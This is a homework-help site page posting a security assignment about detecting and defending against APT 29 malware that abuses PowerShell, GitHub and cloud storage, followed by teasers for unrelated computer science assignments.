User Account

All Pages

Establish a baseline of normal use

Assignment Help Basic Computer Science
Reference no: EM131376785

Take a look at this malware used by APT 29 a Russian hacking group. This is very advanced malware -  very stealthy.  This malware uses normal IT processes to execute, such as powershell.  This example is the reason that all Security Operations Centers need to monitor the changing threat picture.  Most organizations do not monitor powershell use.  In order to monitor powershell, the organizations needs to upgrade to powershell 5, then start ingesting logs into a correlated event management system. The organization then needs to establish a baseline of normal use in order to determine an anomaly.   Additionally a lot of commercial organizations use git hub and cloud storage, which this malware uses both.  Very hard to defend against this type of attack.  

Please answer the following:

1. What are some of the methods you would use to detect anonymous powershell activity?

2. As a security professional, what steps would you take to defend, detect and re mediate against this type of attack.

Requirements:

Needs to be in APA format with a min of 2 resources. Min 300 words

Reference no: EM131376785

Questions Cloud

Should funding for the u.s. space program be changed : Select three (3) topics that interest you most and identify two (2) credible sources for each topic. Note: This is one (1) of several parts that will build toward a final draft of your persuasive writing research paper. Write a one to two (1-2) pa..
Business requirements document : Write an eight to ten (8-10) page original business requirements document for the project plan using the template provided. Note: The template can be found in the Student Center of the online course shell.
What is the difference between an entity and an attribute : What are the four primary traits that help determine the value of information?- What is the difference between an entity and an attribute?
What is data warehouse and why business want to implement : What is a data warehouse and why would a business want to implement one?- Why would you need to use multidimensional analysis?
Establish a baseline of normal use : The organization then needs to establish a baseline of normal use in order to determine an anomaly.   Additionally a lot of commercial organizations use git hub and cloud storage, which this malware uses both.  Very hard to defend against this typ..
Research your chosen failure of creative thought : Identify an instance in which an individual or group was unsuccessful in using creative thinking to solve a problem, (such as the passage of prohibition in the United States in an attempt to reduce crime and improve living conditions for the worki..
Dictionary for nine tampa bay rays : Make a dictionary for nine Tampa Bay Rays (see below). Use the player names as keys and a list for each value. See page 374. Each value list should hold the position played by the player, the batting order, and current batting average.
Describe two of the gestalt laws of perceptual organization : Describe two of the Gestalt Laws of perceptual organization, illustrating each with a specific example.Evaluate the fit between Gestalt theories of perceptual organization and Biederman's Geon Theory.Describe the differences and similarities among fi..
Describe two scenarios for use of given type of software : Describe two scenarios (other than those described here) for the use of this type of software: one in which the use would be ethical and one in which it would be unethical.

Reviews

Write a Review

Basic Computer Science Questions & Answers

  Identifies the cost of computer

identifies the cost of computer components to configure a computer system (including all peripheral devices where needed) for use in one of the following four situations:

  Input devices

Compare how the gestures data is generated and represented for interpretation in each of the following input devices. In your comparison, consider the data formats (radio waves, electrical signal, sound, etc.), device drivers, operating systems suppo..

  Cores on computer systems

Assignment : Cores on Computer Systems:  Differentiate between multiprocessor systems and many-core systems in terms of power efficiency, cost benefit analysis, instructions processing efficiency, and packaging form factors.

  Prepare an annual budget in an excel spreadsheet

Prepare working solutions in Excel that will manage the annual budget

  Write a research paper in relation to a software design

Research paper in relation to a Software Design related topic

  Describe the forest, domain, ou, and trust configuration

Describe the forest, domain, OU, and trust configuration for Bluesky. Include a chart or diagram of the current configuration. Currently Bluesky has a single domain and default OU structure.

  Construct a truth table for the boolean expression

Construct a truth table for the Boolean expressions ABC + A'B'C' ABC + AB'C' + A'B'C' A(BC' + B'C)

  Evaluate the cost of materials

Evaluate the cost of materials

  The marie simulator

Depending on how comfortable you are with using the MARIE simulator after reading

  What is the main advantage of using master pages

What is the main advantage of using master pages. Explain the purpose and advantage of using styles.

  Describe the three fundamental models of distributed systems

Explain the two approaches to packet delivery by the network layer in Distributed Systems. Describe the three fundamental models of Distributed Systems

  Distinguish between caching and buffering

Distinguish between caching and buffering The failure model defines the ways in which failure may occur in order to provide an understanding of the effects of failure. Give one type of failure with a brief description of the failure

Free Assignment Quote

Assured A++ Grade

Get guaranteed satisfaction & time on delivery in every assignment order you paid with us! We ensure premium quality solution document along with free turntin report!

Submit Assignment

Academics

Major Subjects

Majors

Get In Touch

whatsapp: +91-977-207-8620

Phone: +91-977-207-8620

Email: [email protected]

TERMS & POLICIES

HELP & SUPPORT

All rights reserved! Copyrights ©2019-2020 ExpertsMind IT Educational Pvt Ltd